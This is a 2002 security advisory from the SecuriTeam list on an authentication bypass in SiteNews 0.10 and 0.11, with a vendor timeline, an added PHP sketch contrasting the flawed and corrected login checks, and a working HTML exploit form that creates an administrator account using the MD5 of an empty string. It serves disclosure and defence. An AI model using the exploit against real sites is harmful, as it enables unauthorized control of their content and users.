[EXPL] SiteNews Remote Add User
From: support@securiteam.com
Date: 02/17/02
From: support@securiteam.com To: list@securiteam.com Date: Sun, 17 Feb 2002 00:36:03 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SiteNews Remote Add User
------------------------------------------------------------------------
SUMMARY
SiteNews (http://www.linuxnetwork.nl/) is an open-source system for
displaying and managing news items on websites. According to its homepage,
it has been downloaded almost 4000 times. A security vulnerability in the
product allows attackers to log on without a valid username and
password.
DETAILS
Vulnerable systems:
SiteNews version 0.10
SiteNews version 0.11
Immune systems:
SiteNews version 0.12
The function GetPassword in function.php returns an empty string when it
is asked for a non-existent username. This, together with the fact that the
program sends usernames in cleartext and passwords as MD5 sums, means that
you can log in without an account by posting a non-existent username and
the MD5 sum for an empty string as the password. SiteNews has no concept
of user levels, so once you are in you have full control over all news
items and all users.
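The flaw described above, next to a corrected check, as an added example that is not SiteNews source code or part of the original advisory. Only the name GetPassword comes from the advisory; the other function names, the user table and the assumption that the server compares md5(GetPassword(user)) with the posted value are hypothetical.

```php
<?php
// Hypothetical reconstruction of the logic the advisory describes.
// Constructed sample data: username => stored password.
$users = ['editor' => 'sample-password'];

// Flawed lookup: an unknown username yields '' instead of an error.
function GetPassword(array $users, string $username): string
{
    return $users[$username] ?? '';
}

// Flawed check (assumed shape): for an unknown user the left side becomes
// md5(''), so a client that posts md5('') is accepted without an account.
function login_vulnerable(array $users, string $username, string $sentMd5): bool
{
    return md5(GetPassword($users, $username)) === $sentMd5;
}

// Corrected lookup: "no such user" is a distinct result, not a blank password.
function find_password(array $users, string $username): ?string
{
    return array_key_exists($username, $users) ? $users[$username] : null;
}

// Corrected check: reject unknown users and blank credentials before any
// comparison, then compare in constant time.
function login_hardened(array $users, string $username, string $sentMd5): bool
{
    $stored = find_password($users, $username);
    if ($stored === null || $stored === '') {
        return false;
    }
    return hash_equals(md5($stored), $sentMd5);
}

// MD5 of the empty string, the hidden "password" value in the form on this page.
$emptyMd5 = md5('');

// Same request against both checks: unknown user plus md5('').
var_dump(login_vulnerable($users, 'no-such-user', $emptyMd5));
var_dump(login_hardened($users, 'no-such-user', $emptyMd5));

// A legitimate login still succeeds against the corrected check.
var_dump(login_hardened($users, 'editor', md5('sample-password')));
```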
Vendor status:
The author was contacted with an explanation, an exploit and a patch on
the 5th of February. Version 0.12, which is not vulnerable, was released
on the 7th of February.
Exploit:
To exploit the problem all you need to do is type in a non-existent
username and the user and password combination that you wish to add to the
system, and the exploit creates the new user for you, despite the fact
that you are not authorized.
<html>
<head>
<title>SiteNews Exploit 0.1</title>
</head>
<body bgcolor="#ffffff" text="#000000" link="#000000" alink="#000000"
vlink="#000000">
<h1>SiteNews Exploit 0.1</h1>
<form method="POST"
action="http://www.victim.com/sitenews/admin/add_user.php"
enctype="multipart/form-data">
Written by <a href="mailto:metaur@prontomail.com">Ulf Härnhammar</a>
in 2002.
<p>
This exploit will add a new user to a SiteNews installation. The exploit
user is basically any non-existent user, so you just type some random
characters there.<p>
<br>
<input type="text" name="username" size="20"><br>
<input type="hidden" name="password"
value="d41d8cd98f00b204e9800998ecf8427e" size="0">
<!-- This is the MD5 sum for an empty string. -->
New user:<br>
<input type="text" name="new_user" size="20"><br>
<input type="hidden" name="action1" value="1" size="0">
New password:<br>
<input type="text" name="new_password" size="20"><br>
<input type="submit" value="Exploit it">
</form>
</body>
</html>
ADDITIONAL INFORMATION
The information has been provided by Ulf Härnhammar
<mailto:ulfh@update.uu.se>.